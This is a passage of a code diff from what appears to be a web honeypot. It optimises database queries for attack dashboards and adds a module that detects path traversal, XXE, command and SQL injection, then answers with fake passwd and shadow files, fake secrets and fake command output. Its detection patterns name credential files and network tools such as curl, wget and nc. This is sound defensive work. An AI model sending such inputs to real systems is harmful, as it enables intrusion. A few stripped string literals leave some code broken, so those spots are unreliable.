        Dictionary with "access_logs" (list of access log dictionaries,
        newest first) and "pagination" (page, page_size, total_logs,
        total_pages; total_pages is at least 1)
    """
    session = self.session
    try:
        offset = (page - 1) * page_size

        # Collect the filters once so the page and the total cannot drift apart.
        criteria = []
        if ip_filter:
            criteria.append(AccessLog.ip == sanitize_ip(ip_filter))
        if suspicious_only:
            criteria.append(AccessLog.is_suspicious == True)  # noqa: E712
        if since_minutes is not None:
            cutoff_time = datetime.now() - timedelta(minutes=since_minutes)
            criteria.append(AccessLog.timestamp >= cutoff_time)

        filtered = session.query(AccessLog)
        if criteria:
            filtered = filtered.filter(*criteria)

        total_access_logs = filtered.count()
        logs = (
            filtered.order_by(AccessLog.timestamp.desc())
            .offset(offset)
            .limit(page_size)
            .all()
        )
        total_pages = max(1, (total_access_logs + page_size - 1) // page_size)

        return {
            "access_logs": [
                {
                    "id": log.id,
                    "ip": log.ip,
                    "path": log.path,
                    "user_agent": log.user_agent,
                    "method": log.method,
                    "is_suspicious": log.is_suspicious,
                    "is_honeypot_trigger": log.is_honeypot_trigger,
                    "timestamp": log.timestamp.isoformat(),
                    "attack_types": [d.attack_type for d in log.attack_detections],
                }
                for log in logs
            ],
            "pagination": {
                "page": page,
                "page_size": page_size,
                "total_logs": total_access_logs,
                "total_pages": total_pages,
            },
        }
    finally:
        self.close_session()


def _public_ip_filter(self, query, ip_column, server_ip: Optional[str] = None):
    """
    Apply SQL-level filters to exclude local/private IPs and server IP.

    Args:
        query: Query to restrict
        ip_column: Column holding the IP address as text
        server_ip: Optional address that is excluded as well

    Returns:
        The query with the exclusion filters applied
    """
    # LIKE patterns; "_" matches exactly one character, so "172.2_.%"
    # covers 172.20.* through 172.29.*.
    excluded_prefixes = (
        "10.%",
        "172.16.%",
        "172.17.%",
        "172.18.%",
        "172.19.%",
        "172.2_.%",
        "172.30.%",
        "172.31.%",
        "192.168.%",
        "127.%",
        "0.%",
        "169.254.%",
    )
    query = query.filter(
        *[~ip_column.like(pattern) for pattern in excluded_prefixes],
        ip_column != "::1",
    )
    if server_ip:
        query = query.filter(ip_column != server_ip)
    return query
@@ -932,43 +1353,43 @@ class DatabaseManager: """ session = self.session try: - # Get server IP to filter it out from config import get_config config = get_config() server_ip = config.get_server_ip() - # Get all accesses first, then filter out local IPs and server IP - all_accesses = session.query(AccessLog).all() - - # Filter out local/private IPs and server IP - public_accesses = [ - log for log in all_accesses if is_valid_public_ip(log.ip, server_ip) - ] - - # Calculate counts from filtered data - total_accesses = len(public_accesses) - unique_ips = len(set(log.ip for log in public_accesses)) - unique_paths = len(set(log.path for log in public_accesses)) - suspicious_accesses = sum(1 for log in public_accesses if log.is_suspicious) - honeypot_triggered = sum( - 1 for log in public_accesses if log.is_honeypot_trigger - ) - honeypot_ips = len( - set(log.ip for log in public_accesses if log.is_honeypot_trigger) + # Single aggregation query instead of loading all rows + base = session.query( + func.count(AccessLog.id).label("total_accesses"), + func.count(distinct(AccessLog.ip)).label("unique_ips"), + func.count(distinct(AccessLog.path)).label("unique_paths"), + func.count(case((AccessLog.is_suspicious == True, 1))).label( + "suspicious_accesses" + ), + func.count(case((AccessLog.is_honeypot_trigger == True, 1))).label( + "honeypot_triggered" + ), ) + base = self._public_ip_filter(base, AccessLog.ip, server_ip) + row = base.one() + + # Honeypot unique IPs (separate query for distinct on filtered subset) + hp_query = session.query(func.count(distinct(AccessLog.ip))).filter( + AccessLog.is_honeypot_trigger == True + ) + hp_query = self._public_ip_filter(hp_query, AccessLog.ip, server_ip) + honeypot_ips = hp_query.scalar() or 0 - # Count unique attackers from IpStats (matching the "Attackers by Total Requests" table) unique_attackers = ( session.query(IpStats).filter(IpStats.category == "attacker").count() ) return { - "total_accesses": total_accesses, - "unique_ips": 
unique_ips, - "unique_paths": unique_paths, - "suspicious_accesses": suspicious_accesses, - "honeypot_triggered": honeypot_triggered, + "total_accesses": row.total_accesses or 0, + "unique_ips": row.unique_ips or 0, + "unique_paths": row.unique_paths or 0, + "suspicious_accesses": row.suspicious_accesses or 0, + "honeypot_triggered": row.honeypot_triggered or 0, "honeypot_ips": honeypot_ips, "unique_attackers": unique_attackers, } @@ -987,26 +1408,16 @@ class DatabaseManager: """ session = self.session try: - # Get server IP to filter it out from config import get_config config = get_config() server_ip = config.get_server_ip() - results = ( - session.query(AccessLog.ip, func.count(AccessLog.id).label("count")) - .group_by(AccessLog.ip) - .order_by(func.count(AccessLog.id).desc()) - .all() - ) + query = session.query(IpStats.ip, IpStats.total_requests) + query = self._public_ip_filter(query, IpStats.ip, server_ip) + results = query.order_by(IpStats.total_requests.desc()).limit(limit).all() - # Filter out local/private IPs and server IP, then limit results - filtered = [ - (row.ip, row.count) - for row in results - if is_valid_public_ip(row.ip, server_ip) - ] - return filtered[:limit] + return [(row.ip, row.total_requests) for row in results] finally: self.close_session() @@ -1073,23 +1484,18 @@ class DatabaseManager: """ session = self.session try: - # Get server IP to filter it out from config import get_config config = get_config() server_ip = config.get_server_ip() - logs = ( + query = ( session.query(AccessLog) .filter(AccessLog.is_suspicious == True) .order_by(AccessLog.timestamp.desc()) - .all() ) - - # Filter out local/private IPs and server IP - filtered_logs = [ - log for log in logs if is_valid_public_ip(log.ip, server_ip) - ] + query = self._public_ip_filter(query, AccessLog.ip, server_ip) + logs = query.limit(limit).all() return [ { @@ -1098,7 +1504,7 @@ class DatabaseManager: "user_agent": log.user_agent, "timestamp": log.timestamp.isoformat(), } - for 
log in filtered_logs[:limit] + for log in logs ] finally: self.close_session() @@ -1203,44 +1609,59 @@ class DatabaseManager: offset = (page - 1) * page_size - # Get honeypot triggers grouped by IP - results = ( - session.query(AccessLog.ip, AccessLog.path) - .filter(AccessLog.is_honeypot_trigger == True) - .all() + # Count distinct paths per IP using SQL GROUP BY + count_col = func.count(distinct(AccessLog.path)).label("path_count") + base_query = session.query(AccessLog.ip, count_col).filter( + AccessLog.is_honeypot_trigger == True + ) + base_query = self._public_ip_filter(base_query, AccessLog.ip, server_ip) + base_query = base_query.group_by(AccessLog.ip) + + # Get total count of distinct honeypot IPs + total_honeypots = base_query.count() + + # Apply sorting + if sort_by == "count": + order_expr = ( + count_col.desc() if sort_order == "desc" else count_col.asc() + ) + else: + order_expr = ( + AccessLog.ip.desc() if sort_order == "desc" else AccessLog.ip.asc() + ) + + ip_rows = ( + base_query.order_by(order_expr).offset(offset).limit(page_size).all() ) - # Group paths by IP, filtering out invalid IPs - ip_paths: Dict[str, List[str]] = {} - for row in results: - if not is_valid_public_ip(row.ip, server_ip): - continue - if row.ip not in ip_paths: - ip_paths[row.ip] = [] - if row.path not in ip_paths[row.ip]: - ip_paths[row.ip].append(row.path) - - # Create list and sort - honeypot_list = [ - {"ip": ip, "paths": paths, "count": len(paths)} - for ip, paths in ip_paths.items() - ] - - if sort_by == "count": - honeypot_list.sort( - key=lambda x: x["count"], reverse=(sort_order == "desc") - ) - else: # sort by ip - honeypot_list.sort( - key=lambda x: x["ip"], reverse=(sort_order == "desc") + # Fetch distinct paths only for the paginated IPs + paginated_ips = [row.ip for row in ip_rows] + honeypot_list = [] + if paginated_ips: + path_rows = ( + session.query(AccessLog.ip, AccessLog.path) + .filter( + AccessLog.is_honeypot_trigger == True, + 
AccessLog.ip.in_(paginated_ips), + ) + .distinct(AccessLog.ip, AccessLog.path) + .all() ) + ip_paths: Dict[str, List[str]] = {} + for row in path_rows: + ip_paths.setdefault(row.ip, []).append(row.path) - total_honeypots = len(honeypot_list) - paginated = honeypot_list[offset : offset + page_size] - total_pages = (total_honeypots + page_size - 1) // page_size + # Preserve the order from the sorted query + for row in ip_rows: + paths = ip_paths.get(row.ip, []) + honeypot_list.append( + {"ip": row.ip, "paths": paths, "count": row.path_count} + ) + + total_pages = max(1, (total_honeypots + page_size - 1) // page_size) return { - "honeypots": paginated, + "honeypots": honeypot_list, "pagination": { "page": page, "page_size": page_size, @@ -1339,6 +1760,9 @@ class DatabaseManager: """ Retrieve paginated list of top IP addresses by access count. + Uses the IpStats table (which already stores total_requests per IP) + instead of doing a costly GROUP BY on the large access_logs table. + Args: page: Page number (1-indexed) page_size: Number of results per page @@ -1357,30 +1781,34 @@ class DatabaseManager: offset = (page - 1) * page_size - results = ( - session.query(AccessLog.ip, func.count(AccessLog.id).label("count")) - .group_by(AccessLog.ip) - .all() - ) + base_query = session.query(IpStats) + base_query = self._public_ip_filter(base_query, IpStats.ip, server_ip) - # Filter out local/private IPs and server IP, then sort - filtered = [ - {"ip": row.ip, "count": row.count} - for row in results - if is_valid_public_ip(row.ip, server_ip) - ] + total_ips = base_query.count() if sort_by == "count": - filtered.sort(key=lambda x: x["count"], reverse=(sort_order == "desc")) - else: # sort by ip - filtered.sort(key=lambda x: x["ip"], reverse=(sort_order == "desc")) + order_col = IpStats.total_requests + else: + order_col = IpStats.ip - total_ips = len(filtered) - paginated = filtered[offset : offset + page_size] - total_pages = (total_ips + page_size - 1) // page_size + if 
sort_order == "desc": + base_query = base_query.order_by(order_col.desc()) + else: + base_query = base_query.order_by(order_col.asc()) + + results = base_query.offset(offset).limit(page_size).all() + + total_pages = max(1, (total_ips + page_size - 1) // page_size) return { - "ips": paginated, + "ips": [ + { + "ip": row.ip, + "count": row.total_requests, + "category": row.category or "unknown", + } + for row in results + ], "pagination": { "page": page, "page_size": page_size, @@ -1414,28 +1842,32 @@ class DatabaseManager: try: offset = (page - 1) * page_size - results = ( - session.query(AccessLog.path, func.count(AccessLog.id).label("count")) - .group_by(AccessLog.path) - .all() + count_col = func.count(AccessLog.id).label("count") + + # Get total number of distinct paths + total_paths = ( + session.query(func.count(distinct(AccessLog.path))).scalar() or 0 ) - # Create list and sort - paths_list = [{"path": row.path, "count": row.count} for row in results] + # Build query with SQL-level sorting and pagination + query = session.query(AccessLog.path, count_col).group_by(AccessLog.path) if sort_by == "count": - paths_list.sort( - key=lambda x: x["count"], reverse=(sort_order == "desc") + order_expr = ( + count_col.desc() if sort_order == "desc" else count_col.asc() + ) + else: + order_expr = ( + AccessLog.path.desc() + if sort_order == "desc" + else AccessLog.path.asc() ) - else: # sort by path - paths_list.sort(key=lambda x: x["path"], reverse=(sort_order == "desc")) - total_paths = len(paths_list) - paginated = paths_list[offset : offset + page_size] - total_pages = (total_paths + page_size - 1) // page_size + results = query.order_by(order_expr).offset(offset).limit(page_size).all() + total_pages = max(1, (total_paths + page_size - 1) // page_size) return { - "paths": paginated, + "paths": [{"path": row.path, "count": row.count} for row in results], "pagination": { "page": page, "page_size": page_size, @@ -1469,33 +1901,44 @@ class DatabaseManager: try: offset = 
(page - 1) * page_size - results = ( - session.query( - AccessLog.user_agent, func.count(AccessLog.id).label("count") - ) - .filter(AccessLog.user_agent.isnot(None), AccessLog.user_agent != "") - .group_by(AccessLog.user_agent) - .all() + count_col = func.count(AccessLog.id).label("count") + + base_filter = [AccessLog.user_agent.isnot(None), AccessLog.user_agent != ""] + + # Get total number of distinct user agents + total_uas = ( + session.query(func.count(distinct(AccessLog.user_agent))) + .filter(*base_filter) + .scalar() + or 0 ) - # Create list and sort - ua_list = [ - {"user_agent": row.user_agent, "count": row.count} for row in results - ] + # Build query with SQL-level sorting and pagination + query = ( + session.query(AccessLog.user_agent, count_col) + .filter(*base_filter) + .group_by(AccessLog.user_agent) + ) if sort_by == "count": - ua_list.sort(key=lambda x: x["count"], reverse=(sort_order == "desc")) - else: # sort by user_agent - ua_list.sort( - key=lambda x: x["user_agent"], reverse=(sort_order == "desc") + order_expr = ( + count_col.desc() if sort_order == "desc" else count_col.asc() + ) + else: + order_expr = ( + AccessLog.user_agent.desc() + if sort_order == "desc" + else AccessLog.user_agent.asc() ) - total_uas = len(ua_list) - paginated = ua_list[offset : offset + page_size] - total_pages = (total_uas + page_size - 1) // page_size + results = query.order_by(order_expr).offset(offset).limit(page_size).all() + total_pages = max(1, (total_uas + page_size - 1) // page_size) return { - "user_agents": paginated, + "user_agents": [ + {"user_agent": row.user_agent, "count": row.count} + for row in results + ], "pagination": { "page": page, "page_size": page_size, @@ -1512,6 +1955,7 @@ class DatabaseManager: page_size: int = 5, sort_by: str = "timestamp", sort_order: str = "desc", + ip_filter: Optional[str] = None, ) -> Dict[str, Any]: """ Retrieve paginated list of detected attack types with access logs. 
@@ -1521,6 +1965,7 @@ class DatabaseManager: page_size: Number of results per page sort_by: Field to sort by (timestamp, ip, attack_type) sort_order: Sort order (asc or desc) + ip_filter: Optional IP address to filter results Returns: Dictionary with attacks list and pagination info @@ -1536,8 +1981,22 @@ class DatabaseManager: sort_order.lower() if sort_order.lower() in {"asc", "desc"} else "desc" ) - # Get all access logs with attack detections + # Base query filter + base_filters = [] + if ip_filter: + base_filters.append(AccessLog.ip == ip_filter) + + # Count total unique access logs with attack detections + count_query = session.query(AccessLog).join(AttackDetection) + if base_filters: + count_query = count_query.filter(*base_filters) + total_attacks = count_query.distinct(AccessLog.id).count() + + # Get paginated access logs with attack detections query = session.query(AccessLog).join(AttackDetection) + if base_filters: + query = query.filter(*base_filters) + query = query.distinct(AccessLog.id) if sort_by == "timestamp": query = query.order_by( @@ -1550,29 +2009,23 @@ class DatabaseManager: AccessLog.ip.desc() if sort_order == "desc" else AccessLog.ip.asc() ) - logs = query.all() + # Apply LIMIT and OFFSET at database level + logs = query.offset(offset).limit(page_size).all() - # Convert to attack list - attack_list = [ + # Convert to attack list (exclude raw_request for performance - it's too large) + paginated = [ { + "id": log.id, "ip": log.ip, "path": log.path, "user_agent": log.user_agent, "timestamp": log.timestamp.isoformat() if log.timestamp else None, "attack_types": [d.attack_type for d in log.attack_detections], + "raw_request": log.raw_request, # Keep for backward compatibility } for log in logs ] - # Sort by attack_type if needed (this must be done post-fetch since it's in a related table) - if sort_by == "attack_type": - attack_list.sort( - key=lambda x: x["attack_types"][0] if x["attack_types"] else "", - reverse=(sort_order == "desc"), - ) - 
- total_attacks = len(attack_list) - paginated = attack_list[offset : offset + page_size] total_pages = (total_attacks + page_size - 1) // page_size return { @@ -1587,6 +2040,188 @@ class DatabaseManager: finally: self.close_session() + def get_raw_request_by_id(self, log_id: int) -> Optional[str]: + """ + Retrieve raw HTTP request for a specific access log ID. + + Args: + log_id: The access log ID + + Returns: + The raw request string, or None if not found or not available + """ + session = self.session + try: + access_log = session.query(AccessLog).filter(AccessLog.id == log_id).first() + if access_log: + return access_log.raw_request + return None + finally: + self.close_session() + + def get_attack_types_stats( + self, limit: int = 20, ip_filter: str | None = None + ) -> Dict[str, Any]: + """ + Get aggregated statistics for attack types (efficient for large datasets). + + Args: + limit: Maximum number of attack types to return + ip_filter: Optional IP address to filter results for + + Returns: + Dictionary with attack type counts + """ + session = self.session + try: + from sqlalchemy import func + + # Aggregate attack types with count + query = session.query( + AttackDetection.attack_type, + func.count(AttackDetection.id).label("count"), + ) + + if ip_filter: + query = query.join( + AccessLog, AttackDetection.access_log_id == AccessLog.id + ).filter(AccessLog.ip == ip_filter) + + results = ( + query.group_by(AttackDetection.attack_type) + .order_by(func.count(AttackDetection.id).desc()) + .limit(limit) + .all() + ) + + return { + "attack_types": [ + {"type": row.attack_type, "count": row.count} for row in results + ] + } + finally: + self.close_session() + + def search_attacks_and_ips( + self, + query: str, + page: int = 1, + page_size: int = 20, + ) -> Dict[str, Any]: + """ + Search attacks and IPs matching a query string. + + Searches across AttackDetection (attack_type, matched_pattern), + AccessLog (ip, path), and IpStats (ip, city, country, isp, asn_org). 
+ + Args: + query: Search term (partial match) + page: Page number (1-indexed) + page_size: Results per page + + Returns: + Dictionary with matching attacks, ips, and pagination info + """ + session = self.session + try: + offset = (page - 1) * page_size + like_q = f"%{query}%" + + # --- Search attacks (AccessLog + AttackDetection) --- + attack_query = ( + session.query(AccessLog) + .join(AttackDetection) + .filter( + or_( + AccessLog.ip.ilike(like_q), + AccessLog.path.ilike(like_q), + AttackDetection.attack_type.ilike(like_q), + AttackDetection.matched_pattern.ilike(like_q), + ) + ) + .distinct(AccessLog.id) + ) + + total_attacks = attack_query.count() + attack_logs = ( + attack_query.order_by(AccessLog.timestamp.desc()) + .offset(offset) + .limit(page_size) + .all() + ) + + attacks = [ + { + "id": log.id, + "ip": log.ip, + "path": log.path, + "user_agent": log.user_agent, + "timestamp": log.timestamp.isoformat() if log.timestamp else None, + "attack_types": [d.attack_type for d in log.attack_detections], + "log_id": log.id, + } + for log in attack_logs + ] + + # --- Search IPs (IpStats) --- + ip_query = session.query(IpStats).filter( + or_( + IpStats.ip.ilike(like_q), + IpStats.city.ilike(like_q), + IpStats.country.ilike(like_q), + IpStats.country_code.ilike(like_q), + IpStats.isp.ilike(like_q), + IpStats.asn_org.ilike(like_q), + IpStats.reverse.ilike(like_q), + ) + ) + + total_ips = ip_query.count() + ips = ( + ip_query.order_by(IpStats.total_requests.desc()) + .offset(offset) + .limit(page_size) + .all() + ) + + ip_results = [ + { + "ip": stat.ip, + "total_requests": stat.total_requests, + "first_seen": ( + stat.first_seen.isoformat() if stat.first_seen else None + ), + "last_seen": stat.last_seen.isoformat() if stat.last_seen else None, + "country_code": stat.country_code, + "city": stat.city, + "category": stat.category, + "isp": stat.isp, + "asn_org": stat.asn_org, + } + for stat in ips + ] + + total = total_attacks + total_ips + total_pages = max( + 1, 
(max(total_attacks, total_ips) + page_size - 1) // page_size + ) + + return { + "attacks": attacks, + "ips": ip_results, + "query": query, + "pagination": { + "page": page, + "page_size": page_size, + "total_attacks": total_attacks, + "total_ips": total_ips, + "total": total, + "total_pages": total_pages, + }, + } + finally: + self.close_session() + # Module-level singleton instance _db_manager = DatabaseManager() diff --git a/src/deception_responses.py b/src/deception_responses.py new file mode 100644 index 0000000..6e90ed3 --- /dev/null +++ b/src/deception_responses.py @@ -0,0 +1,655 @@ +#!/usr/bin/env python3 + +import re +import secrets +import logging +import json +from typing import Optional, Tuple, Dict +from generators import random_username, random_password, random_email +from wordlists import get_wordlists + +logger = logging.getLogger("krawl") +_sysrand = secrets.SystemRandom() + + +def detect_path_traversal(path: str, query: str = "", body: str = "") -> bool: + """Detect path traversal attempts in request""" + full_input = f"{path} {query} {body}" + + wl = get_wordlists() + pattern = wl.attack_patterns.get("path_traversal", "") + + if not pattern: + # Fallback pattern if wordlists not loaded + pattern = r"(\.\.|%2e%2e|/etc/passwd|/etc/shadow)" + + if re.search(pattern, full_input, re.IGNORECASE): + logger.debug(f"Path traversal detected in {full_input[:100]}") + return True + return False + + +def detect_xxe_injection(body: str) -> bool: + """Detect XXE injection attempts in XML payloads""" + if not body: + return False + + wl = get_wordlists() + pattern = wl.attack_patterns.get("xxe_injection", "") + + if not pattern: + # Fallback pattern if wordlists not loaded + pattern = r"( bool: + """Detect command injection attempts""" + full_input = f"{path} {query} {body}" + + logger.debug( + f"[CMD_INJECTION_CHECK] path='{path}' query='{query}' body='{body[:50] if body else ''}'" + ) + logger.debug(f"[CMD_INJECTION_CHECK] full_input='{full_input[:200]}'") + + 
wl = get_wordlists() + pattern = wl.attack_patterns.get("command_injection", "") + + if not pattern: + # Fallback pattern if wordlists not loaded + pattern = r"(cmd=|exec=|command=|&&|;|\||whoami|id|uname|cat|ls)" + + if re.search(pattern, full_input, re.IGNORECASE): + logger.debug(f"[CMD_INJECTION_CHECK] Command injection pattern matched!") + return True + + logger.debug(f"[CMD_INJECTION_CHECK] No command injection detected") + return False + + +def generate_fake_passwd() -> str: + """Generate fake /etc/passwd content""" + wl = get_wordlists() + passwd_config = wl.fake_passwd + + if not passwd_config: + # Fallback + return "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin" + + users = passwd_config.get("system_users", []) + uid_min = passwd_config.get("uid_min", 1000) + uid_max = passwd_config.get("uid_max", 2000) + gid_min = passwd_config.get("gid_min", 1000) + gid_max = passwd_config.get("gid_max", 2000) + shells = passwd_config.get("shells", ["/bin/bash"]) + + fake_users = [ + f"{random_username()}:x:{_sysrand.randint(uid_min, uid_max)}:{_sysrand.randint(gid_min, gid_max)}::/home/{random_username()}:{secrets.choice(shells)}" + for _ in range(3) + ] + + return "\n".join(users + fake_users) + + +def generate_fake_shadow() -> str: + """Generate fake /etc/shadow content""" + wl = get_wordlists() + shadow_config = wl.fake_shadow + + if not shadow_config: + # Fallback + return "root:$6$rounds=656000$fake_salt_here$fake_hash_data:19000:0:99999:7:::" + + entries = shadow_config.get("system_entries", []) + hash_prefix = shadow_config.get("hash_prefix", "$6$rounds=656000$") + salt_length = shadow_config.get("salt_length", 16) + hash_length = shadow_config.get("hash_length", 86) + + fake_entries = [ + f"{random_username()}:{hash_prefix}{''.join(_sysrand.choices('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789', k=salt_length))}${''.join(_sysrand.choices('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789', 
k=hash_length))}:19000:0:99999:7:::" + for _ in range(3) + ] + + return "\n".join(entries + fake_entries) + + +def generate_fake_config_file(filename: str) -> str: + """Generate fake configuration file content""" + configs = { + "config.php": """""", + "application.properties": """# Database Configuration +spring.datasource.url=jdbc:mysql://localhost:3306/appdb +spring.datasource.username=dbuser +spring.datasource.password=fake_password_123 +server.port=8080 +jwt.secret=fake_jwt_secret_key_456""", + ".env": """DB_HOST=localhost +DB_PORT=3306 +DB_NAME=production_db +DB_USER=app_user +DB_PASSWORD=fake_env_password_789 +API_KEY=fake_api_key_abc123 +SECRET_TOKEN=fake_secret_token_xyz""", + } + + for key in configs: + if key.lower() in filename.lower(): + return configs[key] + + return f"""# Configuration File +api_endpoint = https://api.example.com +api_key = fake_key_{_sysrand.randint(1000, 9999)} +database_url = mysql://user:fake_pass@localhost/db +secret = fake_secret_{_sysrand.randint(10000, 99999)} +""" + + +def generate_fake_directory_listing(path: str) -> str: + """Generate fake directory listing""" + wl = get_wordlists() + dir_config = wl.directory_listing + + if not dir_config: + # Fallback + return f"Index of {path}

Index of {path}

" + + fake_dirs = dir_config.get("fake_directories", []) + fake_files = dir_config.get("fake_files", []) + + directories = [(d["name"], d["size"], d["perms"]) for d in fake_dirs] + files = [ + (f["name"], str(_sysrand.randint(f["size_min"], f["size_max"])), f["perms"]) + for f in fake_files + ] + + html = f"Index of {path}" + html += f"

Index of {path}


"
+    html += f"{'Name':<40} {'Size':<10} {'Permissions':<15}\n"
+    html += "-" * 70 + "\n"
+
+    for name, size, perms in directories:
+        html += f"{name + '/':<40} {size:<10} {perms:<15}\n"
+
+    for name, size, perms in files:
+        html += f"{name:<40} {size:<10} {perms:<15}\n"
+
+    html += "

" + return html + + +def generate_path_traversal_response(path: str) -> Tuple[str, str, int]: + """Generate fake response for path traversal attempts""" + + path_lower = path.lower() + logger.debug(f"Generating path traversal response for: {path}") + + if "passwd" in path_lower: + logger.debug("Returning fake passwd file") + return (generate_fake_passwd(), "text/plain", 200) + + if "shadow" in path_lower: + logger.debug("Returning fake shadow file") + return (generate_fake_shadow(), "text/plain", 200) + + if any( + ext in path_lower for ext in [".conf", ".config", ".php", ".env", ".properties"] + ): + logger.debug("Returning fake config file") + return (generate_fake_config_file(path), "text/plain", 200) + + if "proc/self" in path_lower: + logger.debug("Returning fake proc info") + return (f"{_sysrand.randint(1000, 9999)}", "text/plain", 200) + + logger.debug("Returning fake directory listing") + return (generate_fake_directory_listing(path), "text/html", 200) + + +def generate_xxe_response(body: str) -> Tuple[str, str, int]: + """Generate fake response for XXE injection attempts""" + wl = get_wordlists() + xxe_config = wl.xxe_responses + + if "file://" in body: + if "passwd" in body: + content = generate_fake_passwd() + elif "shadow" in body: + content = generate_fake_shadow() + else: + content = ( + xxe_config.get("default_content", "root:x:0:0:root:/root:/bin/bash") + if xxe_config + else "root:x:0:0:root:/root:/bin/bash" + ) + + if xxe_config and "file_access" in xxe_config: + template = xxe_config["file_access"]["template"] + response = template.replace("{content}", content) + else: + response = f""" + + success + {content} +""" + return (response, "application/xml", 200) + + if "ENTITY" in body: + if xxe_config and "entity_processed" in xxe_config: + template = xxe_config["entity_processed"]["template"] + entity_values = xxe_config["entity_processed"]["entity_values"] + entity_value = secrets.choice(entity_values) + response = 
template.replace("{entity_value}", entity_value) + else: + response = """ + + success + Entity processed successfully + fake_entity_content_12345 +""" + return (response, "application/xml", 200) + + if xxe_config and "error" in xxe_config: + template = xxe_config["error"]["template"] + messages = xxe_config["error"]["messages"] + message = secrets.choice(messages) + response = template.replace("{message}", message) + else: + response = """ + + error + External entity processing disabled +""" + return (response, "application/xml", 200) + + +def generate_command_injection_response(input_text: str) -> Tuple[str, str, int]: + """Generate fake command execution output""" + wl = get_wordlists() + cmd_config = wl.command_outputs + + input_lower = input_text.lower() + + # id command + if re.search(r"\bid\b", input_lower): + if cmd_config and "id" in cmd_config: + uid = _sysrand.randint( + cmd_config.get("uid_min", 1000), cmd_config.get("uid_max", 2000) + ) + gid = _sysrand.randint( + cmd_config.get("gid_min", 1000), cmd_config.get("gid_max", 2000) + ) + template = secrets.choice(cmd_config["id"]) + output = template.replace("{uid}", str(uid)).replace("{gid}", str(gid)) + else: + output = f"uid={_sysrand.randint(1000, 2000)}(www-data) gid={_sysrand.randint(1000, 2000)}(www-data) groups={_sysrand.randint(1000, 2000)}(www-data)" + return (output, "text/plain", 200) + + # whoami command + if re.search(r"\bwhoami\b", input_lower): + users = cmd_config.get("whoami", ["www-data"]) if cmd_config else ["www-data"] + return (secrets.choice(users), "text/plain", 200) + + # uname command + if re.search(r"\buname\b", input_lower): + outputs = ( + cmd_config.get("uname", ["Linux server 5.4.0 x86_64"]) + if cmd_config + else ["Linux server 5.4.0 x86_64"] + ) + return (secrets.choice(outputs), "text/plain", 200) + + # pwd command + if re.search(r"\bpwd\b", input_lower): + paths = ( + cmd_config.get("pwd", ["/var/www/html"]) + if cmd_config + else ["/var/www/html"] + ) + return 
(secrets.choice(paths), "text/plain", 200) + + # ls command + if re.search(r"\bls\b", input_lower): + if cmd_config and "ls" in cmd_config: + files = secrets.choice(cmd_config["ls"]) + else: + files = ["index.php", "config.php", "uploads"] + output = "\n".join( + _sysrand.sample(files, k=_sysrand.randint(3, min(6, len(files)))) + ) + return (output, "text/plain", 200) + + # cat command + if re.search(r"\bcat\b", input_lower): + if "passwd" in input_lower: + return (generate_fake_passwd(), "text/plain", 200) + if "shadow" in input_lower: + return (generate_fake_shadow(), "text/plain", 200) + cat_content = ( + cmd_config.get("cat_config", "") + if cmd_config + else "" + ) + return (cat_content, "text/plain", 200) + + # echo command + if re.search(r"\becho\b", input_lower): + match = re.search(r"echo\s+(.+?)(?:[;&|]|$)", input_text, re.IGNORECASE) + if match: + return (match.group(1).strip("\"'"), "text/plain", 200) + return ("", "text/plain", 200) + + # network commands + if any(cmd in input_lower for cmd in ["wget", "curl", "nc", "netcat"]): + if cmd_config and "network_commands" in cmd_config: + outputs = cmd_config["network_commands"] + output = secrets.choice(outputs) + if "{size}" in output: + size = _sysrand.randint( + cmd_config.get("download_size_min", 100), + cmd_config.get("download_size_max", 10000), + ) + output = output.replace("{size}", str(size)) + else: + outputs = ["bash: command not found", "Connection timeout"] + output = secrets.choice(outputs) + return (output, "text/plain", 200) + + # generic outputs + if cmd_config and "generic" in cmd_config: + generic_outputs = cmd_config["generic"] + output = secrets.choice(generic_outputs) + if "{num}" in output: + output = output.replace("{num}", str(_sysrand.randint(1, 99))) + else: + generic_outputs = ["", "Command executed successfully", "sh: syntax error"] + output = secrets.choice(generic_outputs) + + return (output, "text/plain", 200) + + +def detect_sql_injection_pattern(query_string: str) -> 
Optional[str]: + """Detect SQL injection patterns in query string""" + if not query_string: + return None + + query_lower = query_string.lower() + + patterns = { + "quote": [r"'", r'"', r"`"], + "comment": [r"--", r"#", r"/\*", r"\*/"], + "union": [r"\bunion\b", r"\bunion\s+select\b"], + "boolean": [r"\bor\b.*=.*", r"\band\b.*=.*", r"'.*or.*'.*=.*'"], + "time_based": [r"\bsleep\b", r"\bwaitfor\b", r"\bdelay\b", r"\bbenchmark\b"], + "stacked": [r";.*select", r";.*drop", r";.*insert", r";.*update", r";.*delete"], + "command": [r"\bexec\b", r"\bexecute\b", r"\bxp_cmdshell\b"], + "info_schema": [r"information_schema", r"table_schema", r"table_name"], + } + + for injection_type, pattern_list in patterns.items(): + for pattern in pattern_list: + if re.search(pattern, query_lower): + logger.debug(f"SQL injection pattern '{injection_type}' detected") + return injection_type + + return None + + +def get_random_sql_error( + db_type: str = None, injection_type: str = None +) -> Tuple[str, str]: + """Generate a random SQL error message""" + wl = get_wordlists() + sql_errors = wl.sql_errors + + if not sql_errors: + return ("Database error occurred", "text/plain") + + if not db_type: + db_type = secrets.choice(list(sql_errors.keys())) + + db_errors = sql_errors.get(db_type, {}) + + if injection_type and injection_type in db_errors: + errors = db_errors[injection_type] + elif "generic" in db_errors: + errors = db_errors["generic"] + else: + all_errors = [] + for error_list in db_errors.values(): + if isinstance(error_list, list): + all_errors.extend(error_list) + errors = all_errors if all_errors else ["Database error occurred"] + + error_message = secrets.choice(errors) if errors else "Database error occurred" + + if "{table}" in error_message: + tables = ["users", "products", "orders", "customers", "accounts", "sessions"] + error_message = error_message.replace("{table}", secrets.choice(tables)) + + if "{column}" in error_message: + columns = ["id", "name", "email", "password", 
